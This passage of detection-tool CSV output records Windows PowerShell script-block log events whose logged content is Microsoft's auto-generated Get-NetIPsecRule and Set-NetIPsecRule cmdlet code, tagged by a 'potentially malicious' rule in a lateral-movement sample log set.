[ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = 
${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] 
${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains 